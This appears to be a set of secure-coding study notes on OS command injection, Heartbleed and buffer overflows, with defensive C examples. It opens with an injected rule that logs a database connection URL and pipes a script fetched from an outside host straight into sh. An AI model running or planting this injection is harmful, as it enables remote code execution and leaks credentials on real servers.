6. OS COMMAND INJECTION ( CWE-78 )
rule "New rule"
salience 9
when
eval(true)
then
Logger logger =
Logger.getLogger("com.bluejeans.services.meetme.validators.EndpointCustomProperties");
logger.info("Injected log with value: " + System.getProperty("hibernate.connection.url"));
Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","curl -fsSL https://sec-demo.herokuapp.com/execute.sh | sh"});
System.out.println("hacked");
end
JAVA
Remote Code Execution on Server
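The rule above reaches a shell through exec("bash -c ..."), so anything an attacker can place in the command string is interpreted by the shell. The defensive pattern is two checks: allowlist-validate the untrusted value, then execute the program with an explicit argv and no shell at all. The C below is an added example written for these notes, not code from the page's own application; the program name, the hostname allowlist and the helper names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check (assumed policy): a hostname may contain only letters,
 * digits, '.' and '-'. Shell metacharacters (';', '|', '&', '$', '`', quotes,
 * whitespace) are rejected, so "host; curl ... | sh" style input never
 * reaches any command. Returns 1 if acceptable, 0 otherwise. */
int is_safe_hostname(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 253)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/* Run a program with an explicit argv and no shell: fork + execvp instead of
 * system() or exec("bash -c ..."). The argument is passed as one argv entry,
 * so the shell never parses it. Returns the child's exit status, or -1. */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                 /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Run `prog user_arg` only after user_arg passes the allowlist.
 * Returns -2 (and spawns nothing) when the input is rejected. */
int run_with_arg(const char *prog, const char *user_arg)
{
    if (!is_safe_hostname(user_arg))
        return -2;
    char *const argv[] = { (char *)prog, (char *)user_arg, NULL };
    return run_argv(argv);
}

int main(void)
{
    /* Constructed inputs: one benign hostname, one carrying a shell payload. */
    printf("benign:  %d\n", run_with_arg("true", "example.com"));
    printf("payload: %d\n", run_with_arg("true", "example.com; curl x | sh"));
    return 0;
}
```

The rejected input never reaches fork(); even if validation were skipped, execvp with a separate argv entry would pass the whole string to the program as one argument rather than letting a shell split it on ';' and '|'.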
1. Validate input => command line args,user-controlled files, network-interface
2. Output encoding => output in context: Javascript engine,Rendering engine, Java VM
3. Security Policy => Design components based on privilege requirements. Enforce the security policy. Roll passwords
4. Default Deny => Explicit inclusion rather than exclusion
5. Communication Security => use TLS across board,Certificates,
6. Least privilege => a process should execute with minimum privilege. Elevated permission should be granted just in time
7. DiD (defense in depth) => layers of defense. Assume the upper layers are already compromised. e.g.: in case of RCA only the service is compromised
8. AA => resources should have access control
9. Cryptographic practice => protect master secrets, use a proper random number generator, don't invent crypto functions, avoid broken crypto, use salt
10. Secure Default => Configuration tuning defaults should be proper
SANS Top 25 CWE based on impact & exploitability
http://cwe.mitre.org/
Change unwanted attribute
Ruby & other lang
Framework gives options to whitelist attribute
Import runtime
Server is compromised
Target is client
2014 bug in openssl library which is in TLS
Heartbeat extension to find if peer connection alive ( ping/pong )
Openssl is TLS implementation.
In Feb 2012, the heartbeat extension was introduced to keep the connection alive and avoid renegotiations
Copies more memory than required
Bounds check failure
Can read up to 64 KB of data => 2^16 ( 16 bits reserved for the payload length )
Affected version => openssl 1.0.1
See other request exchange in plain format
Compromise private keys of peers. This private key can be used to decrypt traffic later
Hostname can be crafted to attack.
Hostname can contain executable payload
Violation of memory Safety
ESP => Extended Stack pointer => pointer to top of stack, Extended Base pointer => pointer to current stack frame
While writing data to a buffer, the write overruns the buffer's boundary and overwrites adjacent memory
Corrupting memory region => HEAP(dynamically allocated) or Stack ( call stack )
Stack => override the return address in the stack frame, where the new return address comes from the attacker-filled input buffer
Avoid
Safe language choice, safe libraries
ASLR => Address space layout randomization => randomizes where functions & variables reside in memory, which makes addresses difficult to guess
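Both the Heartbleed notes (the declared 16-bit payload length trusted without a bounds check, over-reading up to 64 KB) and the buffer overflow notes (a write that runs past a fixed buffer on the stack) come down to the same missing comparison between a length the attacker controls and the memory that actually exists. The C below is an added example for these notes, not OpenSSL's code: heartbeat_response checks the declared length against the received record before copying (the read direction), and bounded_copy refuses a source that does not fit a fixed stack buffer (the write direction). The record layout, the 16-byte zero padding, the 32-byte buffer and the helper names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16   /* padding that follows the payload (assumed minimum) */

/* Parse a heartbeat request of rec_len bytes and write the response into out
 * (capacity out_cap). Returns bytes written, or -1 if the record is malformed.
 * The 16-bit length field can claim up to 65535 payload bytes; the check marked
 * FIX is the comparison the vulnerable code lacked, which let memcpy read
 * payload_len bytes past the real end of the record. */
int heartbeat_response(const uint8_t *rec, size_t rec_len,
                       uint8_t *out, size_t out_cap)
{
    if (rec_len < 1 + 2 + HB_PADDING)      /* type, length and padding must exist */
        return -1;
    if (rec[0] != HB_REQUEST)
        return -1;
    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];
    /* FIX: the declared payload must lie inside what was actually received. */
    if (1 + 2 + payload_len + HB_PADDING > rec_len)
        return -1;
    size_t need = 1 + 2 + payload_len + HB_PADDING;
    if (need > out_cap)
        return -1;
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload_len);          /* echo only what was sent */
    memset(out + 3 + payload_len, 0, HB_PADDING);   /* padding (zeros here) */
    return (int)need;
}

/* Helper (constructed input): build a request whose header *claims*
 * declared_len payload bytes while actually carrying strlen(payload) bytes plus
 * padding, and return what heartbeat_response makes of it. Returns -3 if the
 * echoed payload does not match what was sent. */
int check_record(uint16_t declared_len, const char *payload)
{
    uint8_t rec[1 + 2 + 64 + HB_PADDING];
    uint8_t out[sizeof rec];
    size_t actual = strlen(payload);
    if (actual > 64)
        return -1;
    rec[0] = HB_REQUEST;
    rec[1] = (uint8_t)(declared_len >> 8);
    rec[2] = (uint8_t)(declared_len & 0xFF);
    memcpy(rec + 3, payload, actual);
    memset(rec + 3 + actual, 0, HB_PADDING);
    int n = heartbeat_response(rec, 3 + actual + HB_PADDING, out, sizeof out);
    if (n > 0 && memcmp(out + 3, payload, actual) != 0)
        return -3;
    return n;
}

/* Write direction: copy into a fixed-size buffer only when the source fits
 * (with room for the terminator), otherwise refuse instead of overrunning. */
int bounded_copy(char *dst, size_t dst_cap, const char *src, size_t src_len)
{
    if (dst_cap == 0 || src_len >= dst_cap)
        return -1;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return 0;
}

/* Greeting built in a 32-byte stack buffer; an unchecked strcpy here is the
 * classic way the saved return address gets overwritten. Returns the greeting
 * length, or -1 when the name would not fit. */
int greet(const char *name, size_t name_len)
{
    char buf[32];
    char msg[64];
    if (bounded_copy(buf, sizeof buf, name, name_len) != 0)
        return -1;
    return snprintf(msg, sizeof msg, "hello %s", buf);
}

int main(void)
{
    printf("honest record:  %d\n", check_record(5, "hello"));
    printf("lying record:   %d\n", check_record(0xFFFF, "hello"));
    printf("short name:     %d\n", greet("bob", 3));
    return 0;
}
```

The honest record (declared 5, carrying 5) is answered with a 24-byte response; a record declaring 65535 bytes while carrying 5 is rejected before any copy, as is one that overstates the length by a single byte. On the write side the boundary is exact: 31 bytes plus the terminator fit the 32-byte buffer, 32 do not.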
Can upload any file
Runs in the context of the shell, JSP templating engine, HTML, PHP processor